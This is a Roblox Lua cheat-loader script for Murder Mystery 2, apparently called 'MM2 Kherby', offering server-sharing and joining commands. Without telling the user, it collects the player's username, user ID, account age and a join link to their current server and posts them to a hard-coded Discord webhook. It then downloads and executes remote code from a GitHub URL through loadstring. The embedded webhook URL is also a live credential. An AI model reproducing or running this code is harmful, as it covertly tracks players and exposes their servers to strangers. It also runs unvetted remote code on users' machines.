local webhookURL = "https://discord.com/api/webhooks/1491802833857548299/-9JrsKh2M9gQ5avRKaXuBj3nwqFTRKKswA23xovpnrzRKR7fXbuI59dSnXWRC_kdQo6O"

local function getDetailedPlayerInfo()
    local info = {
        name = "Unknown",
        id = "Unknown",
        displayName = "Unknown",
        accountAge = "Unknown"
    }
    
    local success, player = pcall(function()
        return game:GetService("Players").LocalPlayer
    end)
    
    if success and player then
        info.name = player.Name
        info.id = player.UserId
        info.displayName = (player.DisplayName and player.DisplayName ~= "") and player.DisplayName or player.Name
        
        pcall(function()
            local accountAge = player.AccountAge
            if accountAge and accountAge ~= "" then
                info.accountAge = tostring(accountAge) .. " days"
            else
                info.accountAge = "Unknown"
            end
        end)
    end
    
    return info
end

local function sendAdvancedLog(player)
    local gameInfo = game:GetService("GameId")
    local placeId = game.PlaceId or "Unknown"
    local jobId = game.JobId or "Unknown"
    local gameName = game:GetService("MarketplaceService"):GetProductInfo(placeId, Enum.InfoType.Asset).Name
    if not gameName or gameName == "" then
        gameName = "Unknown"
    end
    
    local shortJobId = "Unknown"
    if jobId and jobId ~= "Unknown" then
        shortJobId = string.sub(jobId, 1, 8) .. "..."
    end
    
    local userId = tostring(player.id or "0")
    local robloxProfileURL = "https://www.roblox.com/users/" .. userId .. "/profile"
    local avatarURL = "https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" .. userId .. "&size=420x420&format=Png&isCircular=false"
    
    local serverLink = string.format("https://plsbrainrot.me/joiner?placeId=%d&gameInstanceId=%s", placeId, jobId)
    
    local data = {
        ["content"] = "",
        ["embeds"] = {{
            ["title"] = "🔥 Script Execution Alert",
            ["description"] = "A script has been successfully executed in the game instance.\n[View Roblox Profile](" .. robloxProfileURL .. ")",
            ["color"] = 15671167,
            ["thumbnail"] = {
                ["url"] = avatarURL
            },
            ["fields"] = {
                {
                    ["name"] = "👤 Player Information",
                    ["value"] = "```\nUsername: " .. tostring(player.name or "Unknown") .. "\nDisplay Name: " .. tostring(player.displayName or "Unknown") .. "\nUser ID: " .. tostring(player.id or "Unknown") .. "\nAccount Age: " .. tostring(player.accountAge or "Unknown") .. "\n```",
                    ["inline"] = false
                },
                {
                    ["name"] = "🎮 Game Details",
                    ["value"] = "```\nGame Name: " .. tostring(gameName) .. "\nPlace ID: " .. tostring(placeId) .. "\nJob ID: " .. shortJobId .. "\n```",
                    ["inline"] = false
                },
                {
                    ["name"] = "📦 Script Information",
                    ["value"] = "```\nName: MM2 Kherby\nSource: GitHub (kherbyy/mm2-kherby)\nMethod: Loadstring Execution\n```",
                    ["inline"] = false
                },
                {
                    ["name"] = "🔗 Join Link (Click to join)",
                    ["value"] = serverLink,
                    ["inline"] = false
                },
                {
                    ["name"] = "⏰ Execution Time",
                    ["value"] = "`" .. os.date("%A, %B %d, %Y • %I:%M:%S %p") .. "`",
                    ["inline"] = false
                }
            },
            ["footer"] = {
                ["text"] = "MM2 Kherby Logger • Premium Edition",
                ["icon_url"] = "https://cdn.discordapp.com/emojis/1006044156379295774.png"
            },
            ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")
        }}
    }
    
    local jsonData = game:GetService("HttpService"):JSONEncode(data)
    
    pcall(function()
        request({
            Url = webhookURL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = jsonData
        })
    end)
end

-- ============================================
-- JOINER COMMANDS
-- ============================================

local TeleportService = game:GetService("TeleportService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

getgenv().share = function()
    local placeId = game.PlaceId
    local jobId = game.JobId
    local link = string.format("https://plsbrainrot.me/joiner?placeId=%d&gameInstanceId=%s", placeId, jobId)
    setclipboard(link)
    print("Server link copied to clipboard!")
    print("Link: " .. link)
    return link
end

getgenv().join = function(link)
    local instanceId = link:match("gameInstanceId=([%w%-]+)")
    if instanceId then
        print("Joining server...")
        TeleportService:TeleportToGameInstance(142823291, instanceId, LocalPlayer)
    else
        print("Invalid link. Use the link from share()")
    end
end

getgenv().getServerLink = function()
    local placeId = game.PlaceId
    local jobId = game.JobId
    return string.format("https://plsbrainrot.me/joiner?placeId=%d&gameInstanceId=%s", placeId, jobId)
end

print("")
print("========================================")
print("JOINER COMMANDS READY")
print("========================================")
print("")
print("Commands:")
print("  share() - Copy your server link to clipboard")
print("  join('link') - Join a server from a plsbrainrot.me link")
print("  getServerLink() - Get your current server link")
print("")

local player = getDetailedPlayerInfo()
sendAdvancedLog(player)

wait(0.5)

loadstring(game:HttpGet("https://raw.githubusercontent.com/kherbyy/mm2-kherby/refs/heads/main/mm2%20kherby"))()
